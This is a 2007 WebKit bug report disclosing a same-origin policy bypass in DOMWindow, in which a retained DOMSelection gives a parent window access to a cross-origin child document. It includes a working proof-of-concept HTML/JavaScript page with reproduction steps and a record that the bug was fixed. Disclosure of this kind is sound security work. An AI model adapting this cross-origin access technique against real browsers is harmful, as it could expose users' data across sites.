Bug 14610

Summary: Security problem in DOMWindow
Product: WebKit Reporter: Feng Qian <ian.eng.webkit>
Component: WebCore JavaScript    Assignee: Nobody <webkit-unassigned>
Status: RESOLVED FIXED
Severity: Normal CC: ddkilzer
Priority: P1 Keywords: EasyFix, HasReduction, InRadar
Version: 523.x (Safari 3)
Hardware: All
OS: All

Description Feng Qian 2007-07-13 11:12:42 PDT
The problem was introduced by recent code refactoring in kjs_window
and DOMWindow. When navigating to a new page, DOMWindow does not
clear up its DOMSelection object.

To show the problem, save the following text into a file, say 'selection.html':

<html><script>
var child;   // the window opened by openwin()
var sel;     // DOMSelection taken from the child while it is still same-origin

function openwin() {
 child = open("hello.html");
}
function getsel() {
 sel = child.getSelection();
}
function reloadwin() {
 child.location="world.html";
}
function check() {
 // sel was obtained before the navigation; if it is not cleared on
 // navigation, anchorNode now belongs to the new (cross-origin) document.
 var selected = sel.anchorNode;
 var new_doc = selected.ownerDocument;
 alert(new_doc.baseURI);
}

</script>
<body>
<button onclick="openwin()">open</button>
<button onclick="getsel()">get selection</button>
<button onclick="reloadwin()">reload</button>
<button onclick="check()">check</button>
</body></html>

Also create two files called hello.html and world.html:

hello.html:
<html><body>hello</body></html>

world.html:
<html><body>world</body></html>


Put selection.html and hello.html in the same domain, and put
world.html in a different domain (you need to change URLs of
hello.html and world.html in selection.html).

Do the following steps:
1. load 'selection.html' in a new window;
2. click the 'open' button; it opens a child window;
3. select the "hello" text in the child window;
4. click the 'get selection' button in the parent window;
5. click the 'check' button; an alert window pops up and displays the
URL of 'hello.html'.

So far so good.

6. click the 'reload' button in the parent window; it loads the
'world.html' page in the child window.
   Note that now the parent window and the child window are in
different domains.
7. select 'world' in the child window;
8. click the 'check' button in the first window. An alert window pops
up and displays the URL of 'world.html'.  At this point, the parent
window has full access to the Document object and the DOM nodes under it
in the child window even though they are from different domains.

I will make a patch later.
Comment 1 Sam Weinig 2007-07-13 11:27:15 PDT
<rdar://problem/5333782>
Comment 2 Sam Weinig 2007-07-17 22:44:01 PDT
Fixed in r24398.